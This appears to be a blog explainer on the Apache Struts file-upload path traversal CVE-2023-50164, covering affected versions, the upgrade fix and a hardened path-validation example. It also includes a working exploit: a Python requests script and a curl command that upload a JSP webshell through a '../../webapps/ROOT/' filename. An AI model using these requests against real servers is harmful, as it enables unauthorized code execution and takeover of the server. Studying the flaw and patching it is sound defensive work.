
Apache Struts is a widely used web application framework for Java that helps developers build robust enterprise-grade applications. But in late 2023, a critical security flaw was discovered: CVE-2023-50164. This vulnerability lets hackers manipulate file upload parameters, traverse directories, and—under the right conditions—upload malicious files, sometimes even leading to Remote Code Execution (RCE).

If you're using Struts, it’s vital to learn about this bug. Here’s what you need to know, boiled down into simple language, with code snippets, links, and real exploit details.

What is CVE-2023-50164?

This vulnerability impacts the file upload functionality in Apache Struts. When an application allows file uploads (like profile images or documents), it should restrict where uploaded files are saved—ideally just to a single, safe folder. However, due to improper input validation, a hacker can:

- Change the upload parameters to specify a file path anywhere on the server
- Use “../” (dot-dot-slash) path traversal tricks to climb out of the intended directory
- Under certain setups, upload a script or binary that gets executed remotely, leading to full Remote Code Execution!

Who is Affected?

If your Struts app allows users to upload files and you’re running a vulnerable version, you’re at risk. This especially includes Struts 2.0.0 to 2.5.32 and 6.0.0 to 6.3.0.1.

Recommended Fix:
Amazon, Red Hat, and Apache all strongly recommend updating to Struts 2.5.33, Struts 6.3.0.2, or later.

Normal Upload:

The application lets users POST files to /upload, stored in /uploads/user-file.jpg.

Malicious Upload:

The attacker tweaks the form field or sends a custom HTTP POST request where the filename looks like this:

```
../../webapps/yourapp/WEB-INF/webshell.jsp
```

Now the application stores the file outside /uploads/, placing it directly in the webroot. If the server executes .jsp files, the attacker can upload a webshell, which means full control over your server.
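To show the server-side mistake described above next to its fix, here is an added Python model (not code from the original post and not Struts’ own implementation): `vulnerable_target` joins the client-supplied filename onto the upload directory unchecked, while `check_upload_name` and `safe_target` reduce it to a validated basename, apply an extension allow-list, and prove the resolved path is still inside the upload root. The upload root and allowed extensions are constructed example values.

```python
import os
import re
from pathlib import PurePosixPath
from typing import Optional, Tuple

# Constructed example values; a real application would supply its own.
UPLOAD_ROOT = "/srv/app/uploads"
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".pdf"}  # images/documents, never .jsp
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}")


def vulnerable_target(upload_root: str, client_filename: str) -> str:
    """Models the flaw described above: the client-controlled filename is joined
    onto the upload directory as-is, so '../' segments climb out of it."""
    return os.path.normpath(os.path.join(upload_root, client_filename))


def check_upload_name(client_filename: str) -> Tuple[Optional[str], str]:
    """Reduce a client-supplied filename to a safe basename.
    Returns (basename, "ok") or (None, reason); the reason is meant for logging,
    so traversal attempts become visible to detection rules."""
    if "\x00" in client_filename:
        return None, "nul byte in filename"
    # Treat backslashes as separators too; Windows clients and some parsers do.
    name = client_filename.replace("\\", "/")
    if name != PurePosixPath(name).name:
        return None, "directory component in filename (possible traversal)"
    if name in ("", ".", "..") or not SAFE_NAME.fullmatch(name):
        return None, "filename fails character allow-list"
    if os.path.splitext(name)[1].lower() not in ALLOWED_EXTENSIONS:
        return None, "extension not allowed"
    return name, "ok"


def safe_target(upload_root: str, client_filename: str) -> Optional[str]:
    """Hardened version: validate the name, then confirm the resolved path is
    still inside upload_root before returning it."""
    name, _reason = check_upload_name(client_filename)
    if name is None:
        return None
    root = os.path.realpath(upload_root)
    target = os.path.realpath(os.path.join(root, name))
    # Containment check catches anything the name filter might have missed.
    if os.path.commonpath([root, target]) != root:
        return None
    return target


if __name__ == "__main__":
    evil = "../../webapps/ROOT/webshell.jsp"
    print("vulnerable:", vulnerable_target(UPLOAD_ROOT, evil))  # lands outside /uploads
    print("hardened:  ", safe_target(UPLOAD_ROOT, evil), check_upload_name(evil)[1])
```

Logging the rejection reason is what turns this from a silent fix into a detection signal: a burst of "possible traversal" rejections against an upload endpoint is worth an alert.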

Here’s a Python example using `requests`:

```python
import requests

# Placeholder host used throughout this write-up.
url = 'http://vulnerable-struts-app/upload.action'

# The filename field carries the traversal sequence; the body is a minimal JSP.
files = {
    'file': (
        '../../webapps/ROOT/webshell.jsp',
        '<% out.println("Shell!"); %>',
        'application/octet-stream'
    )
}

response = requests.post(url, files=files)
print("Status:", response.status_code)
```

If the server is vulnerable and accepts the path traversal, your shell will land at `http://vulnerable-struts-app/webshell.jsp`.

You can do this attack with just `curl`:

```bash
curl -F 'file=@malicious.jsp;filename=../../webapps/ROOT/webshell.jsp' \
  http://vulnerable-struts-app/upload.action
```

- Data Theft: Access to configuration or sensitive data files.
- Full RCE: If attackers upload a shell (like a JSP backdoor), they can execute commands, install malware, or pivot further inside your network.

Important: The impact is not limited to RCE; attackers can also use the arbitrary file write to poison logs or crash the server. RCE is simply the worst-case scenario.

References & Further Reading

- CVE-2023-50164 NVD Entry
- Apache Struts Security Bulletin
- Exploit Details on GitHub
- Struts Upgrade Instructions

Wrap Up

CVE-2023-50164 is a powerful illustration of how a tiny oversight—missing or weak validation on file upload parameters—can crack open a whole server to hackers. The fix is clear: upgrade your Struts now and audit your upload logic. Don’t wait for an incident!

If you’re worried or have doubts, you can try the sample exploit on your own non-production systems (never on unauthorized targets!) or use automated vulnerability scanners to double-check.

Timeline

Published on: 12/07/2023 09:15:07 UTC
Last modified on: 12/12/2023 17:01:42 UTC